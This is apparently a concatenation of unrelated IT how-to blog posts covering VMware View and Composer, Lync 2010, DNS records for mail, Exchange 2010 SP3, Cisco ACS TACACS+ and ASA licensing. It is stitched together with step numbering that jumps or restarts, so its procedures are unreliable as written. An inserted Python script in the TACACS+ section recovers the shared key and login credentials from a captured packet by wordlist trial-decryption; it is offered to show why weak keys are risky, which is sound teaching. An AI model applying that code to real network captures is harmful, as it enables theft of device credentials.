VMware View is a big product, deploying it can be daunting, and if you’re not sure what you’re doing it’s pretty easy to deploy it ‘misconfigured’, or at the very least not configured as well as it should be. I’m going to run through most of the requirements, but it seems sensible to break this up into a few different articles.
Solution
Configuring Windows Active Directory for VMware View
1. Before you start, on your domain controller open active directory users and computers (dsa.msc). Create an OU for your View Desktops, also to make administration easier create a separate OU for any linked clones you are going to deploy. In the example below I’ve nested one inside the other to keep my AD neat and tidy.
2. Also whilst in AD users and computers, create some groups, one for ViewUsers, and one for ViewAdministrators. Add in your users to the groups as required.
Note: You can call the groups whatever you like, and have as many different groups as you like.
3. Now connect to your Virtual Center Server, and add the domain ViewAdministrators group to the LOCAL Administrators group on that server.
Installing and configuring VMware View 5
4. Run the installer for VMware Connection Server (there are 32-bit and 64-bit versions, make sure you download the correct one, as VMware calls the 64-bit version VMware-viewconnectionserver-x86_64-5.0.1-640055.exe, which at first glance looks like a 32-bit file). Accept all the defaults until you see the following screen, and select View Standard Server.
View Standard Server: Select this if it is the first Connection Server you are deploying.
View Replica Server: Select this if you already have a Connection Server and you want to copy the configuration from that server; once in operation it is just a standard replica server.
View Security Server: Usually placed on an edge network or in a DMZ to broker connection requests.
View Transfer Server: Only required if your clients are going to use ‘Local Mode’ for their View desktops.
5. Accept all the defaults and finish the installation.
6. Connect to the VMware View Administrator console; this is a web connection to https://{Connection-server-name}/admin. Note: Adobe Flash is required for it to work.
7. The first time you connect it will take you straight to View Configuration > Product Licencing and Usage > Select “Edit Licence” and type/paste in your licence key.
8. To point the connection server to your virtual center server, select View Configuration > Servers > vCenter Server section > Add.
9. Give it the vCenter server name, and a username and password for a user who is a member of your ViewAdministrators group.
Note: If your vCenter server has VMware composer installed this is where you would enable it. At this time I do not, but I will return here later after I’ve installed it when I cover VMware Composer and ‘linked clones’.
Related Articles, References, Credits, or External Links
In Part 3 we ran through manual pools, if you want to deploy automated pools using ‘Linked Clones’, then you will need VMware Composer. Composer installs on your Virtual Center Server. It also requires a database, the following is a step by step guide to installing SQL Server 2008 R2 and configuring it for Composer.
VMware View 5 Supported Database Platforms
When you have your database platform installed and configured, on the Virtual Center server create an ODBC connection to the database and install VMware Composer. Finally you will need to enable Composer in the VMware View Administrator Console.
Solution
VMware View – Installing SQL 2008 R2 and Configuring for Composer
1. Let the SQL DVD auto-run and choose Installation > New installation > OK > Product Key > Next > Accept the EULA > Next > Install the setup files.
2. Take note of any warnings: here it’s complaining that I’m on a domain controller (in a test environment this is OK, don’t do this in production!), and it’s giving me a firewall warning. I’m going to disable the firewall, as this lab sits behind a corporate firewall, BUT the correct way to address the warning is to create an inbound exception for TCP port 1433 (the default instance port) scoped to the subnet that actually needs it, or to run the following command.
[box] netsh advfirewall firewall add rule name = SQLPort dir = in protocol = tcp action = allow localport = 1433 remoteip = localsubnet profile = DOMAIN [/box]
3. You only need the “Database Engine Services” and the “Management Tools” , or you can simply install everything > Next > Next > Select Default Instance* > Next > Next.
*Unless you specifically want a named instance.
4. I set the services to run under the ‘System’ account; if you want to use a domain service account use that instead (a dedicated, low-privilege service account is preferable to the domain administrator account). You can use the “Use same account for all” button to save typing > Next.
5. We will need SQL authentication (Mixed Mode), so type in a suitably complex password for the sa account (you can add the current user or the domain administrator as a SQL administrator as well) > Next > If you’re installing Analysis Services you can add an account here > Next.
6. Install the native mode default configuration > Next > Next > Next > Install > Close > Exit the SQL installer.
7. Launch the SQL Management Studio > Log in (for servername simply type in localhost) > Right click Databases > New Database..
8. Give the Database a name > Select the ‘Options’ Settings.
9. Change the recovery model to ‘Simple’ > OK.
10. Expand Security > Logins > Create a new login.
13. Give the new user/login a name, select SQL Server authentication > Set a complex password > Untick ‘Enforce password expiration’ > Select the ‘User Mapping’ section (on the left).
14. Select the database you have just created and give this new login the “db_owner” role (it needs no server-level roles, only rights on the Composer database) > OK > Exit the Management Studio.
VMware View – Configure ODBC Settings on the Virtual Center Server
15. On the vCenter Server > Start > Administrative Tools > Data Sources (ODBC).
16. System DSN > Add > SQL Server Native Client > Finish.
17. Add in the Database name and the server you installed SQL on > Next.
18. Supply the details for the user you created and the password you set > Next.
19. Change the default database from ‘master’ to the one you created > Next > accept all the defaults > Finish.
20. Click ‘Test Data Source’ and it should say TESTS COMPLETED SUCCESSFULLY! > OK > OK > OK.
VMware View – Installing VMware Composer
Note: Composer MUST be installed on your VMware Virtual Center (vCenter) Server.
21. Run the installer > Next > Next > Accept the EULA > Next > Next > Enter the ODBC details and login you created earlier > Next.
22. Next > Install > Finish.
VMware View – Add Composer to VMware View Administrator Console
23. Connect to, and log into the VMware View Administrator Console > View Configuration > Servers > If you already have a vCenter server select Edit > If not select Add.
24. On the vCenter Server settings tab ensure ‘Enable View Composer’ is ticked and add in a domain user (with rights to create, and delete computer objects in the domain) > OK.
25. You will know if the operation was successful as the vCenter logo will change, it will now have a gold/yellow box around it.
Related Articles, References, Credits, or External Links
Windows Server has a password complexity requirement to make sure passwords are strong. Yes, it can be disabled, but while it is in place you need your passwords to conform to the following.
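As an added example (my own script, not part of the original article), here is that policy expressed as a check you can run over proposed service-account and SQL passwords before you type them into the installers above. It implements the documented Windows “Password must meet complexity requirements” rule: at least six characters, not containing the account name or any three-character-or-longer chunk of the display name (split on commas, periods, dashes, underscores, spaces, hashes and tabs), and characters from at least three of the five categories (upper case, lower case, digits, non-alphanumeric, and caseless alphabetic characters such as CJK scripts). The account name, display name and candidate passwords in the demo are made up.

```python
import re

# The display name is split on these delimiters, as the Windows policy does.
NAME_DELIMITERS = re.compile(r"[,.\-_ #\t]+")


def char_categories(password: str) -> dict:
    """Which of the five Windows character categories the password contains."""
    return {
        "upper": any(c.isupper() for c in password),
        "lower": any(c.islower() for c in password),
        "digit": any(c in "0123456789" for c in password),
        "symbol": any(not c.isalnum() and not c.isspace() for c in password),
        # Alphabetic characters with no case (e.g. CJK scripts) form their own category
        "other_alpha": any(c.isalpha() and not c.isupper() and not c.islower() for c in password),
    }


def complexity_failures(password: str, sam_account_name: str = "", display_name: str = "",
                        min_length: int = 6) -> list:
    """Return the reasons a password fails the Windows complexity policy (empty list = passes).

    Six characters is the floor imposed by the complexity setting itself; the separate
    'Minimum password length' policy may raise it, hence the parameter.
    """
    reasons = []
    if len(password) < min_length:
        reasons.append(f"shorter than {min_length} characters")
    folded = password.lower()
    if len(sam_account_name) >= 3 and sam_account_name.lower() in folded:
        reasons.append("contains the account name")
    for token in NAME_DELIMITERS.split(display_name):
        if len(token) >= 3 and token.lower() in folded:
            reasons.append(f"contains part of the display name ({token!r})")
    cats = char_categories(password)
    if sum(cats.values()) < 3:
        present = ", ".join(k for k, v in cats.items() if v) or "none"
        reasons.append(f"uses only {sum(cats.values())} of the 5 character categories ({present})")
    return reasons


if __name__ == "__main__":
    # Constructed sample inputs: account 'pete', display name 'Pete Long'
    for candidate in ("P@ssw0rd!", "password", "Pete2013!", "Long1234", "Pa1"):
        verdict = complexity_failures(candidate, "pete", "Pete Long")
        print(f"{candidate:12} {'OK' if not verdict else '; '.join(verdict)}")
```

Note that the policy is a floor, not a target: a password that passes (like the first sample) can still be a dictionary word with substitutions, so for the SQL sa and Composer logins above use something long and random from a password manager.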
A few weeks ago my boss asked me to take a look at Microsoft Lync, because he was interested in the Lync Client (formerly Microsoft Communicator) for instant messaging.
Decent info is a bit thin on the net, and I don’t have the patience to read stupidly long PDF files. So to redress the balance I thought I would publish my findings below.
Solution
Note: The following procedure is carried out on Server 2008 R2 with Windows 7 Clients, on my VMware test network.
Walkthrough
I know a lot of people don’t like watching videos, so here’s my notes:
Pre-Requisites
1. Download and install, Microsoft Silverlight. (link)
2. IIS (Roles > Add Roles > Web Server IIS) > Next.
Also add:
i. ASP.NET
ii. Logging Tools
iii. Tracing
iv. Client Certificate Mapping Authentication.
v. Windows Authentication
vi. IIS Management Scripts and Tools
Next > Install > Finish.
3. RSAT Tools (Features > Add Features > Remote Server Administration Tools > AD DS and AD LDS Tools) > Next > Install > Close > Select Yes to Reboot > Post-reboot the installation will continue > Close.
4. Have a Certification authority set up in your domain. OR a certificate ready for the Lync Server to import.
Install
1. Run Setup > It will ask to Install C++ let it do so.
2. Once it’s finished, It will ask for the install location > change if required > Install.
3. Accept the EULA > OK.
4. When the Deployment Wizard starts > Select “Prepare Active Directory”.
5. Prepare Schema > Run > Next > Finish.
6. Allow domain replication.
7. Prepare Current Forest > Run > Select Local Domain > Next > Finish.
8. Allow domain replication.
9. Prepare Domain > Run > Next > Finish.
10. When all are completed, add your administrators to the newly created AD group CSAdministrators > Then click “Back” to return to the main page of the Deployment Wizard.
11. Prepare First Standard Edition Server > Next > SQL Express will install > Finish.
12. Install Topology Builder > It installs very quickly and gets a green tick when complete.
13. Start > All Programs > Microsoft Lync Server 2010 > Lync Server Topology Builder > When prompted select > New Topology > OK.
14. Save the topology as requested.
15. Under “Primary SIP Domain” > enter your domain name > Next.
16. Enter any additional domains if required > Next.
11. Give the site a name and description > Next.
12. Enter site details > Next > With the option to “Open the new front end wizard..” selected > Finish.
13. At the “Define a new front end pool” wizard > Next > Enter the FQDN of the server and select Standard Edition > Next.
14. Select features (Everything except PSTN, because I don’t have a PSTN gateway) > Next.
15. Choose to Collocate Mediation Server > Next.
16. Don’t add any further server roles > Next > Next.
17. Let it create a new share > Next.
(Note: manually create the share first, and make sure it has appropriate permissions.)
18. Set external URL if required > Next > we are not adding PSTN > Finish.
19. On the Topology Builder Select > Edit Properties > Central Management Server.
20. Add in the admin URL (Note: Make sure this resolves in DNS), and FQDN of the server > OK.
21. Select Publish Topology > Next > Next > Finish.
22. Re-launch or swap back to the Lync Server Deployment Wizard > Select Install or Update Lync Server System.
24. Run step one “Install Local Configuration Store” > Select “Retrieve directly…” > Next > Finish.
25. Run Step two “Setup or Remove Lync Server Components” > Next > (If you get a Prerequisite installation failed: Wmf2008R2 click the link) > Finish.
26. Run Step three “Request, Install, or Assign Certificates” > Request > Next > Send request immediately > Next.
27. Select your CA > Next > Next > Next.
28. Choose a friendly Name > Next.
29. Fill in your Organisation information > Next > Enter country > State and City > Next > Next > Next > Next > Next > Next > Finish. > Close.
30. Run Step 4 “Start Services” > Next > Finish.
31. Check the service status if you wish.
32. Close the deployment wizard.
Launch “Lync Server control Panel” and Configure
1. Launch the “Lync Server Control Panel” > Log in with an admin account (a member of CSAdministrators, created above at step 10).
2. Navigate to Users > Add.
3. Add in your users and assign them to your pool.
Post Install Tasks
1. You need to create a DNS SRV (Service Location) record so the client can locate the Lync server:
i. Service: _sipinternaltls
ii. Protocol: _tcp
iii. Port Number: 5061
iv. Host offering service: the FQDN of the Lync Server.
Install the ‘Lync Client’ on the client machines.
Related Articles, References, Credits, or External Links
Simply purchasing a domain name is not enough to get email flowing in your direction, and people onto your website. You also need your DNS records to point to your IP address(es) as well.
Some ISPs need either an email or a fax (on company headed notepaper) to request that these records be set up correctly. You will need to send this request to your ISP (or whoever is hosting your public DNS records).
This runs through what information you should request and why.
Remember if you have a security device on the outside of your network (like a firewall or a router providing firewall services) the correct ports will need to be open to your web server (usually TCP Port 80 and/or 443), or your mail server (TCP Port 25, though Exchange may require 443 for OWA and ActiveSync).
Note: This assumes your ISP has given you either a static public IP address or a range of public IP addresses (it is possible to use dynamic DNS services like no-ip if you don’t have a static IP address, but that is not covered here).
To get to http://www.yourwebsite.com people need to be able to translate that address to the IP address of your web server. You do this by sending a “query” to a DNS server, which either checks with other DNS servers, or sends you the IP address directly.
1. You need to purchase your domain name. This may sound obvious but I’ve seen people who own companya.com, simply add company.co.uk to their Exchange server and expect it to work!
2. This website is on my petenetlive.com domain, the people who host my DNS records have a record called an “A Record” (may be called a “host” record depending on your ISP) that points www to the public address of my website, like so;
Note: Above I’ve shown you how the record would look in a Windows DNS server, just so you can get an idea of what these records are that you are requesting. (also they take seconds to create, don’t let your ISP take ages to do this!).
Testing your DNS Host Records
On a Windows client you have a command that can test, and show you what your machine sees when it looks for DNS records: nslookup. Below you can see I’m issuing nslookup www.petenetlive.com to see what IP address www.petenetlive.com should be on.
Note: I’m not on this IP address, I’ve just set it up this way for the purpose of demonstration. Drop to the command line and issue the same command and you will see my real current IP address.
What do I need to Request from my ISP / Domain Host?
Assuming your domain name is xyz-company.com and you have a public IP address of 234.234.234.234. The following should suffice;
[box]
Ref: Domain name xyz-company.com
Please can you arrange for my www record to point to 234.234.234.234
Signed
{Someone your ISP has on record}
[/box]
Setting up DNS Records for a Email Server (A, MX, PTR and SPF Records)
1. Just as above your mail server(s) will need an “A Record“, I’m going to create two (just to demonstrate mail preferences later on), one for mail.petenetlive.com and the other for mail2.petenetlive.com
2. Now, you need an MX (Mail Exchange) Record that points to the A Record(s) you created earlier, you can set them with preferences.
What are MX Record Preferences
If you have multiple mail servers, or a backup mail system you can create as many MX Records as you like, by default mail will be sent to the LOWEST preference first, if that IP address is offline or unreachable it will try the NEXT HIGHEST preference.
Testing your MX Records
As above I’m going to use the nslookup command, though this time I’ll simply issue the nslookup command on its own, then change the type of record it searches for to MX (set type=mx), before I issue my query for the domain name.
Note: Helpfully it also shows you the correct A Records as well.
3. Though not essential to get your mail, you should also have a PTR (Pointer) record(s) set up as well. These work the opposite way round to an A Record. An A Record converts a name into an IP address, a PTR Record converts an IP address back to the name again.
Why Do I Need PTR Records?
With the explosion in the amount of spam being sent, people have sought a system that will cut it down. So some email systems (famously Hotmail) started doing reverse lookups on incoming mail, they lookup the address that is sending them mail (THAT WOULD BE YOU) and if it does not resolve back to the domain name of the email being sent they drop the mail (This is called a Reverse Lookup Failure). So without PTR records you may find you cannot email some domains. If your ISP cannot provide PTR records you may need to ask if you can route your mail through your ISP’s “Smart Host”.
Testing your PTR Records
As above, I’m going to use the nslookup command, though this time I’ll simply issue the nslookup command on its own, then change the type of record it searches for to PTR (set type=ptr), before I query the IP address of the mail server.
4. The last type of record you MAY need is an SPF (Sender Policy Framework) record. It lists the servers and domains that are allowed to send mail for your domain, in a TXT record (the dedicated SPF record type, DNS type 99, is now deprecated). SPF is designed to cut down spam, specifically forged mail claiming to come from your domain, and YOU CERTAINLY NEED ONE IF some external entity sends mail from your email addresses (e.g. your web-hosted CRM system), because that sender has to be listed in it or its mail will fail the check.
How do I create an SPF Record?
An SPF Record is just some text (see above), the simplest way to work out what you need in yours, is to use this wizard.
Testing your SPF Records
As above, I’m going to use the nslookup command, though this time I’ll simply issue the nslookup command on its own, then change the type of record it searches for to TXT (set type=txt), before I query the domain name itself.
What do I need to Request from my ISP / Domain Host?
Assuming your domain name is xyz-company.com and you have a public IP address of 234.234.234.234. The following should suffice;
[box]
Ref: Domain name xyz-company.com
Please can you arrange for the following records to be created;.
A/Host Record for mail.xyz-company.com to point to 234.234.234.234
MX Record (Preference 10) that points to mail.xyz-company.com
PTR Record that points 234.234.234.234 to mail.xyz-company.com
Signed
{Someone your ISP has on record}
[/box]
Assuming your domain name is xyz-company.com and you have a public IP address of 234.234.234.234, and a backup mail server at your secondary site that has an IP address of 333.333.333.333 (placeholder values; 333.333.333.333 is not a real address, substitute your own). The following should suffice;
[box]
Ref: Domain name xyz-company.com
Please can you arrange for the following records to be created;.
A/Host Record for mail.xyz-company.com to point to 234.234.234.234
A/Host Record for mail2.xyz-company.com to point to 333.333.333.333
MX Record (Preference 10) that points to mail.xyz-company.com
MX Record (Preference 20) that points to mail2.xyz-company.com
PTR Record that points 234.234.234.234 to mail.xyz-company.com
PTR Record that points 333.333.333.333 to mail2.xyz-company.com
Signed
{Someone your ISP has on record}
[/box]
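The records in the two requests above have to fit together: each MX target needs an A record, each mail server address needs a PTR that resolves back to it, and the SPF TXT record has to parse. As an added example (my own script, not from the original article) here is an offline checker over a constructed copy of that zone data: the names and addresses are the placeholders from the request templates, 333.333.333.333 is deliberately kept so you can see it caught as invalid, and no PTR has been entered for mail2. It also orders the MX records the way a sending server does (lowest preference value first) and parses the SPF record into its qualifiers and mechanisms.

```python
import ipaddress
import re

# Constructed sample zone data matching the request templates. 333.333.333.333 is the
# placeholder from the text (not a valid IPv4 address) and mail2 has no PTR yet.
A_RECORDS = {
    "www.xyz-company.com": "234.234.234.234",
    "mail.xyz-company.com": "234.234.234.234",
    "mail2.xyz-company.com": "333.333.333.333",
}
MX_RECORDS = [(20, "mail2.xyz-company.com"), (10, "mail.xyz-company.com")]
PTR_RECORDS = {"234.234.234.234": "mail.xyz-company.com"}
TXT_RECORDS = {"xyz-company.com": ["v=spf1 mx a:crm.xyz-company.com -all"]}

# One SPF term: optional qualifier (+ - ~ ?) followed by a mechanism.
SPF_TERM = re.compile(
    r"^([+\-~?]?)(all|ip4:\S+|ip6:\S+|a(?::\S+)?|mx(?::\S+)?|include:\S+|ptr(?::\S+)?|exists:\S+)$"
)


def mx_delivery_order(mx_records):
    """Hosts in the order a sending MTA tries them: lowest preference value first."""
    return [host for _pref, host in sorted(mx_records)]


def check_addresses(a_records):
    """Every A record must carry a syntactically valid IPv4 address."""
    problems = []
    for name, ip in a_records.items():
        try:
            ipaddress.IPv4Address(ip)
        except ValueError:
            problems.append(f"A {name}: '{ip}' is not a valid IPv4 address")
    return problems


def check_mx_targets(mx_records, a_records):
    """An MX must point at a hostname that has an A record, never at a bare IP or a missing name."""
    return [f"MX {pref} {host}: no A record for target"
            for pref, host in mx_records if host not in a_records]


def check_reverse(names, a_records, ptr_records):
    """Forward-confirmed reverse DNS: name -> IP -> PTR name -> A record -> the same IP."""
    problems = []
    for name in names:
        ip = a_records.get(name)
        if ip is None:
            continue
        ptr = ptr_records.get(ip)
        if ptr is None:
            problems.append(f"PTR {ip}: missing; receivers doing reverse lookups may reject mail from {name}")
        elif a_records.get(ptr) != ip:
            problems.append(f"PTR {ip}: points to {ptr}, which does not resolve back to {ip}")
    return problems


def parse_spf(txt_records):
    """Return (qualifier, mechanism) pairs from the domain's SPF record; raise if malformed."""
    spf = [t for t in txt_records if t.lower().startswith("v=spf1")]
    if len(spf) != 1:
        raise ValueError(f"expected exactly one v=spf1 TXT record, found {len(spf)}")
    terms = []
    for term in spf[0].split()[1:]:
        if "=" in term:                      # modifiers such as redirect= or exp=
            terms.append(("", term))
            continue
        m = SPF_TERM.match(term)
        if not m:
            raise ValueError(f"unrecognised SPF term: {term}")
        terms.append((m.group(1) or "+", m.group(2)))
    return terms


def check_mail_records(domain, a_records, mx_records, ptr_records, txt_records):
    """Run every check and return the list of things to go back to the ISP about."""
    problems = check_addresses(a_records)
    problems += check_mx_targets(mx_records, a_records)
    problems += check_reverse([host for _pref, host in mx_records], a_records, ptr_records)
    try:
        terms = parse_spf(txt_records.get(domain, []))
        if not terms or (terms[-1][1] != "all" and not terms[-1][1].startswith("redirect=")):
            problems.append("SPF: record does not end with an 'all' mechanism or a redirect")
    except ValueError as exc:
        problems.append(f"SPF: {exc}")
    return problems


if __name__ == "__main__":
    print("delivery order:", mx_delivery_order(MX_RECORDS))
    for p in check_mail_records("xyz-company.com", A_RECORDS, MX_RECORDS, PTR_RECORDS, TXT_RECORDS):
        print("PROBLEM:", p)
```

Run as-is it reports two problems for the sample zone: the placeholder address on mail2 and the missing PTR for it. Swap the dictionaries for what the nslookup queries above (or a zone export from your DNS host) actually return to check what your ISP has really published, rather than what you asked for.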
Related Articles, References, Credits, or External Links
At the time of writing (14/02/13), the answer is NO, for full coexistence with Exchange 2013 you need to have Exchange 2013 CU1 (Cumulative Update), which at this time is unreleased (Expected Q1 of 2013 – so we are not far away).
Note: CU2 is now released.
Solution
So What do I get with Exchange 2010 SP3?
1. You can install Exchange 2010 on Windows Server 2012, (though you can’t in-place upgrade the OS of an existing Windows 2008 R2 server to 2012).
2. Full support for Internet Explorer 10.
3. All fixes from previous update roll-ups, (including MS13-012).
You will need to perform an AD schema update to install SP3.
Related Articles, References, Credits, or External Links
For network identification I have tended to use RADIUS (in a Windows NPS or IAS flavour), in the past. I turned my back on Cisco TACACS+ back in my ‘Studying for CCNA’ days, because back then it was clunky and awful. I have a client that will be installing ACS in the near future, so I thought I would take a look at it again, and was surprised at how much more polished it is. As Cisco plans to roll ACS into Cisco ISE in the future, I’m not sure if it will remain as a separate product. So we may find people using version 5 for a long time yet.
Solution
I’m deploying ACS version 5.5 as a virtual appliance, remember to give it at least 60GB of hard drive or the install will fail. If you are installing on VMware workstation, choose the ‘I will install the operating system later’ option and manually present the CD image or it will also fail.
Once you have run through the initial setup on the appliance, log in to the web interface and proceed as follows;
1. Join the ACS appliance to your domain. Users and Identity Stores > External Identity Stores > Active Directory > Join/Test Connection > Enter Domain Credentials > Join.
2. Be patient it can take a couple of minutes, wait till it says ‘Joined and Connected’.
3. Make sure you already have some groups in active directory that you want to grant access to, here I’ve got a full-access group and a read-only access group.
Note: I’m going to grant privilege level 15 to full-access, and privilege level 1 to read-only, (yes I know they can still escalate to configure terminal mode, but you can always restrict level 1 so it can only use the show command if you like).
4. Back in ACS > Directory Groups > Add > Add in your Groups > OK.
5. Create a Shell Policy: Policy Elements > Authorization and Permissions > Shell Profiles > Create > First create one for level 15 (full-access).
12. Add > Shell Profile > Select > Select the full-access profile > OK.
13. Repeat for the read-only group.
14. Set the shell profile to read-only access > OK.
15. Access Policies > Service Selection Rules > Create > Set to Match Protocol TACACS > Set the service to Default Device Admin > OK.
16. Network Resources > Network Devices and AAA Clients > Enter the details of your Cisco device and set a shared key (here I’m using 666999 in the lab; in production use a long random key, as this key is all that protects the TACACS+ traffic) > Submit.
17. Make the necessary changes on your Cisco devices, like so;
Cisco IOS TACACS+ Config
[box]
Petes-Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Petes-Router(config)#aaa new-model
Petes-Router(config)#aaa authentication login default group tacacs+ local
Petes-Router(config)#aaa authorization exec default group tacacs+ local
Petes-Router(config)#aaa authorization console
Petes-Router(config)#tacacs-server host 10.254.254.22
Petes-Router(config)#tacacs-server key 666999
Petes-Router(config)#end
Petes-Router#
*Mar 1 00:10:24.691: %SYS-5-CONFIG_I: Configured from console by console
Petes-Router#write mem
Building configuration...
[OK]
Petes-Router#
[/box]
Cisco ASA 5500 (and Next Generation) TACACS+ Config
[box]
Petes-ASA# configure terminal
Petes-ASA(config)# aaa-server PNL-AAA-TACACS protocol tacacs+
Petes-ASA(config-aaa-server-group)# aaa-server PNL-AAA-TACACS (inside) host 10.254.254.22
Petes-ASA(config-aaa-server-host)# key 666999
Petes-ASA(config-aaa-server-host)# exit
Petes-ASA(config)#
-=-=-=-=-Authentication-=-=-=-=-
ASDM Authentication
Petes-ASA(config)# aaa authentication http console PNL-AAA-TACACS LOCAL
Console Authentication
Petes-ASA(config)# aaa authentication serial console PNL-AAA-TACACS LOCAL
SSH Authentication
Petes-ASA(config)# aaa authentication ssh console PNL-AAA-TACACS LOCAL
Telnet Authentication
Petes-ASA(config)# aaa authentication telnet console PNL-AAA-TACACS LOCAL
Enable Mode Authentication
Petes-ASA(config)# aaa authentication enable console PNL-AAA-TACACS LOCAL
-=-=-=-=-Authorisation-=-=-=-=-
Command Protection
Petes-ASA(config)# aaa authorization command PNL-AAA-TACACS LOCAL
Petes-ASA(config)# privilege show level 5 mode configure command aaa
<repeat the privilege line for each command as necessary - Note: Turn this on in the ASDM with command preview enabled and you can copy/paste all the generated commands out and edit them accordingly>
-=-=-=-=-Accounting-=-=-=-=-
Petes-ASA(config)# aaa accounting command PNL-AAA-TACACS
[/box]
18. Now you can test, here I connect as a user with read-only access (Note: I have a greater than prompt, I’m in user EXEC mode). Then when I connect as a full-access user (Note: I have a hash prompt. I’m in privileged EXEC mode).
19. The results are the same if I connect via SSH.
Enabling TACACS+ Through a Firewall
Sometimes you will have a switch in a DMZ, or a router outside your firewall, that you want to secure with TACACS+. To enable this you simply need to open TCP port 49 from the device you are securing to the ACS server (and only from that device: the TACACS+ body is obfuscated with the shared key, not encrypted, so don’t expose port 49 more widely than you must).
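Why the key and the port matter: TACACS+ does not encrypt the packet body with the shared key, it XORs it with an MD5 keystream derived from the session ID, the key, the version byte and the sequence number (RFC 8907, section 4.5), and the header, session ID included, goes over the wire in the clear. As an added example (mine, not from the article, Cisco or ACS) the following script builds an authentication START packet the way a device sends it for a PAP login, then shows that anyone who can read the TCP 49 traffic and guess the key recovers the username and password from that one packet. The session ID, the user/password and the candidate wordlist are constructed; the key is the 666999 from the configs above.

```python
import hashlib
import struct

# RFC 8907 header and authentication START layout
TAC_PLUS_VERSION = 0xC0           # major 0xC, minor 0
TAC_PLUS_AUTHEN = 0x01            # packet type: authentication
TAC_PLUS_UNENCRYPTED_FLAG = 0x01  # set only when no key is configured at all
HEADER = struct.Struct("!BBBBII")    # version, type, seq_no, flags, session_id, length
START = struct.Struct("!BBBBBBBB")   # action, priv_lvl, authen_type, authen_service, 4 x length


def pseudo_pad(session_id, key, version, seq_no, length):
    """RFC 8907 s4.5 keystream: MD5 chained over session_id | key | version | seq_no | previous block."""
    sid = struct.pack("!I", session_id)
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(sid + key + bytes([version, seq_no]) + prev).digest()
        pad += prev
    return pad[:length]


def obfuscate(body, session_id, key, version, seq_no):
    """XOR the body with the pad; XOR is its own inverse, so this also de-obfuscates."""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(x ^ y for x, y in zip(body, pad))


def build_authen_start(user, password, port="tty0", rem_addr="10.254.254.5", priv_lvl=1):
    """START body for a PAP login: action LOGIN (1), authen_type PAP (2), service LOGIN (1)."""
    fields = [s.encode("ascii") for s in (user, port, rem_addr, password)]
    return START.pack(1, priv_lvl, 2, 1, *(len(f) for f in fields)) + b"".join(fields)


def build_packet(body, session_id, key, seq_no=1):
    """Header in the clear, body obfuscated under the shared key."""
    header = HEADER.pack(TAC_PLUS_VERSION, TAC_PLUS_AUTHEN, seq_no, 0, session_id, len(body))
    return header + obfuscate(body, session_id, key, TAC_PLUS_VERSION, seq_no)


def parse_authen_start(body):
    """Decode a START body; return None unless every field is plausible (the 'right key' oracle)."""
    if len(body) < START.size:
        return None
    action, priv_lvl, authen_type, service, *lengths = START.unpack_from(body)
    if action not in (1, 2, 4) or priv_lvl > 15 or not 1 <= authen_type <= 6 or service > 9:
        return None
    if START.size + sum(lengths) != len(body):
        return None
    parts, offset = [], START.size
    for n in lengths:
        chunk = body[offset:offset + n]
        offset += n
        try:
            text = chunk.decode("ascii")
        except UnicodeDecodeError:
            return None
        if not text.isprintable():
            return None
        parts.append(text)
    user, port, rem_addr, data = parts
    return {"user": user, "port": port, "rem_addr": rem_addr, "data": data, "priv_lvl": priv_lvl}


def recover_key(packet, candidates):
    """Trial-decrypt the body with each candidate key; the first plausible START gives the key."""
    version, _ptype, seq_no, flags, session_id, length = HEADER.unpack_from(packet)
    body = packet[HEADER.size:HEADER.size + length]
    if flags & TAC_PLUS_UNENCRYPTED_FLAG:
        return b"", parse_authen_start(body)       # no key at all: body is already plaintext
    for key in candidates:
        parsed = parse_authen_start(obfuscate(body, session_id, key, version, seq_no))
        if parsed is not None:
            return key, parsed
    return None, None


# Constructed capture: the session ID is fixed here (a real device picks one at random per
# session), the key is the one from the article's config, user and password are made up.
SESSION_ID = 0x1234ABCD
SHARED_KEY = b"666999"
CAPTURED = build_packet(build_authen_start("pete", "P@ssw0rd!"), SESSION_ID, SHARED_KEY)
WEAK_KEYS = [b"cisco", b"secret", b"tacacs", b"123456", b"666999"]   # constructed wordlist

if __name__ == "__main__":
    key, start = recover_key(CAPTURED, WEAK_KEYS)
    print(f"key {key!r} recovered: user={start['user']} password={start['data']}")
```

The ‘right key’ test is just whether the de-obfuscated body parses as a sane START (privilege level 0 to 15, a known authentication type, field lengths that add up to the body length, printable ASCII), which is enough to reject wrong keys. A six-digit numeric key like the lab one falls to a wordlist in milliseconds, so use a long random key, restrict port 49 to the management addresses of the devices that need it, and treat any packet with the unencrypted flag set as a misconfiguration.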
Related Articles, References, Credits, or External Links
When Cisco released the 8.2 version of the ASA code, they changed their licensing model for AnyConnect Licenses. There are two licensing models, Premium and Essentials.
Solution
Cisco ASA AnyConnect Premium Licenses.
You get two of these free with your firewall*; with a ‘Premium License’ you can use the AnyConnect client software for remote VPN access, and you can access Clientless SSL facilities via the web portal.
*As pointed out by @nhomsany, “The two default premium licenses available are NOT cross-platform, (i.e. only Mac or Windows).”
Additionally you can use this license model with the Advanced Endpoint Assessment License, which is the license you require for Cisco Secure Desktop. You can also use this license with the AnyConnect Mobile license for access from mobile devices like phones or tablets (both these licenses are an additional purchase).
For most people wishing to buy extra AnyConnect licensing, this will be the one you want. Their type and size differ depending on the ASA platform in question, e.g. the 5505 premium licenses are available as 10-session and 25-session licenses, the 5510 in 10, 25, 50, 100 and 250 sessions. (Note: These are correct for version 8.4 and are subject to change, check with your reseller).
Failover: If you are using failover firewalls you can (but don’t have to) use a shared license model; this lets you purchase a bundle of Premium licenses and share them across multiple pieces of hardware, and requires an ASA to be set up as the license server. Before version 8.3 you needed to purchase licenses for both firewalls. From version 8.3, Cisco allowed the licenses to be replicated between firewalls in a failover pair. The exception is Active/Active, where the licenses from both firewalls are aggregated and ALL are available, providing the total does not exceed the maximum for the hardware being used.
Cisco ASA AnyConnect Essential Licenses
When you enable ‘Essentials Licensing’, your firewall changes its licensing model and the two Premium licenses you get with it are disabled*. The firewall will then ONLY accept AnyConnect connections from the AnyConnect VPN client software.
Note: The portal still exists, but can only be used to download the AnyConnect client software.
With Essentials licensing enabled, the firewall will then accept the maximum VPN sessions it can support for that hardware version (see here), without the need to keep adding licenses.
Note: Remember these are “Peer VPN Sessions”. If you have a bunch of other VPNs (including IPsec ones), then these are taken from the same ‘pot’.
Additionally, you can also use this license with the AnyConnect Mobile license for access from mobile devices like phones or tablets; this license is an additional purchase.
